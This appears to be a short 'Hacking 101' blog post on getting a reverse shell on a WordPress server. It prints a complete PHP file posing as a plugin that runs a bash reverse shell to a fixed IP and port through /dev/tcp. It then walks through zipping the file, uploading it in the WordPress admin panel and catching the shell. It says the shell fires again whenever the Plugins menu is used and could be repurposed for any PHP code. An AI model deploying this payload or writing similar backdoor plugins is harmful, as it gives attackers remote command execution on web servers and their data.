Easy Reverse Shell through WordPress Plugin

Hacking 101 Web App Attack

The code is pretty basic and saved as plugin.php:

<?php

/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Techno Herder
* Author URI: https://hack.technoherder.com
*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.86.99/443 0>&1'");
?>

In order to upload the shell as a plugin, we need to zip it up:

zip plugin.zip plugin.php

Once we get it zipped, we move to the WordPress UI.  Under Plugins, we select Add New:

Select Upload Plugin:


We browse for our newly created plugin:

We select Install Now:





With our handler setup, we catch the shell:




If at this point, we selected Plugins from the WordPress UI, we would see that the shell is not activated.  Technically it is activated, the shell is proof, but the shell is also hanging the completion of the Activate process.  If we kill the shell and then move into Plugins, we’d see:






Our shell is activated.  

If we Edit our Plugin, we’d see:






This is about as basic as you can get.  It’s definitely dirty in the sense that it consistently attempts to toss a shell every time you mess with the Plugins menu item.  This could be cleaned up and it could also be repurposed to do just about anything you can code in PHP.  

1 thought on “Easy Reverse Shell through WordPress Plugin

Leave a Reply

Your email address will not be published. Required fields are marked *